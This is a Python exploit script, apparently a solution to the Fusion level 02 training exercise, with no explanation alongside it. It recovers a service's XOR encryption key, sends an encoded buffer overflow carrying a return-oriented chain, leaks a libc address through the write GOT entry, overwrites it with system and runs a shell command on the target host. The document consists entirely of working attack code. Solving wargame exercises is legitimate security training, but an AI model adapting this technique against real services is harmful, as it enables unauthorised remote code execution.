[exploit-exercises] Fusion level 02

from socket import *
from struct import *
import time
 
def cipher(s,key):
        i=0
        after=""
        while i<len(s):
                after += chr(ord(s[i])^ ord(key[i%128]))
                i=i+1
        return after
 
read = 0x8048860
write = 0x080489c0
ppppr = 0x80499bc
bss = 0x0804b520
write_got = 0x804b3dc
 
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.197.130',20002))
 
time.sleep(1)
 
s.recv(1024)
 
msg="\x00"*128
s.send("E"+pack('<I',len(msg))+msg)
s.recv(121)
size=unpack('<I',s.recv(4))[0]
s.recv(1)
key = ""
while len(key) < 128:
        key += s.recv(1024)
print "[+] Get xor key"
 
cmd="id\x00"
 
payload = "A"*131088
payload += pack('<I',read)
payload += pack('<I',ppppr+1)
payload += pack('<I',0)
payload += pack('<I',bss)
payload += pack('<I',len(cmd))
 
payload += pack('<I',write)
payload += pack('<I',ppppr+1)
payload += pack('<I',1)
payload += pack('<I',write_got)
payload += pack('<I',4)
 
payload += pack('<I',read)
payload += pack('<I',ppppr+1)
payload += pack('<I',0)
payload += pack('<I',write_got)
payload += pack('<I',4)
 
payload += pack('<I',write) # system
payload += "AAAA"
payload += pack('<I',bss)
 
payload = cipher(payload,key)
 
s.send("E"+pack('<I',len(payload))+payload)
s.recv(121)
total=0
while total < len(payload):
        total += len(s.recv(65000))
s.send("Q")
 
s.send(cmd)
 
get = s.recv(4)
write_addr = unpack('<I',"0"*(4-len(get))+get)[0]
system_addr = write_addr - 0xc12c0 + 0x3cb20
print "[+] System: "+hex(system_addr)
 
s.send(pack('<I',system_addr))
 
print s.recv(1024)
 
s.close()